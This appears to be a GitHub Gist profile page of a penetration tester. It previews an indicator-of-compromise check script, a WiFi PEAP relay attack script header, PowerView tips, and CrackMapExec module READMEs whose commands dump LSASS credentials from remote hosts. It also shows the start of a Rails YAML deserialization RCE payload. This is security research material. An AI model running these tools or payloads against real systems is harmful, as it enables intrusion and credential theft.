mpgn
🏅 “Winning is a conscious decision. Make up your mind !”
mpgn / ioc_check.ps1
# https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# https://twitter.com/richinseattle/status/1354296177743679489
# If any of the PowerShell checks below returns True, or any of the reg query commands returns without error, the host is infected!
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig'
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig'
reg query 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update'
[System.IO.File]::Exists('C:\Windows\System32\Nwsapagent.sys')
[System.IO.File]::Exists('C:\Windows\System32\helpsvc.sys')
mpgn / wifi-relay.sh
Created Nov 2, 2020 — forked from 1mm0rt41PC/wifi-relay.sh
Wifi easy PEAP relay
#!/bin/bash
# Wifi easy PEAP relay
#
# Author: 1mm0rt41PC - immortal-pc.info - https://github.com/1mm0rt41PC
#
# Ref:
# - https://github.com/sensepost/hostapd-mana
# - https://github.com/sensepost/wpa_sycophant
# - https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/
# - https://www.youtube.com/watch?v=eYsGyvGxlpI&feature=youtu.be&t=1052
mpgn / Blackfield vs Crackmapexec.md
Last active Oct 15, 2020
Blackfield vs Crackmapexec for fun and profit @mpgn_x64
mpgn / PowerView-3.0-tricks.ps1
Created Mar 29, 2020 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
mpgn / README.md
Created Dec 3, 2019
lsassy module for CME

Installation

  • Copy lsassy.py into cme/modules
  • Reinstall CrackMapExec with python setup.py install

Requirements

Usage

mpgn / README.md
Created Nov 26, 2019
CrackMapExec module to set as "owned" on BloodHound every target owned by the attacker

Installation

  • Copy bloodhound_owned.py into cme/modules and reinstall CrackMapExec with python setup.py install
  • pip install neo4j

Usage

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M bloodhound_owned
mpgn / areadme.md
Last active Dec 6, 2019
Procdump CME module that dumps the LSASS process and extracts the result with pypykatz
  1. Install pypykatz with pip install pypykatz, outside your pipenv
  2. Add this file to cme/module/procdump.py
  3. Reinstall with python setup.py install
  4. run cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump


mpgn / railspwn.rb
Created Mar 18, 2019 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'

class ActiveSupport
  class Deprecation
    def initialize()
      @silenced = true
    end

    class DeprecatedInstanceVariableProxy
mpgn / SubtleCrypto.js
Last active Nov 21, 2020
SubtleCrypto javascript example
// example based on https://github.com/diafygi/webcrypto-examples#rsa-oaep
function importKey() {
  return window.crypto.subtle.importKey(
    "jwk", // can be "jwk" or "raw"
    { // this is an example jwk key; "raw" would be an ArrayBuffer
      kty: "oct",
      k: "Y0zt37HgOx-BY7SQjYVmrqhPkO44Ii2Jcb9yydUDPfE",
      alg: "A256GCM",
      ext: true,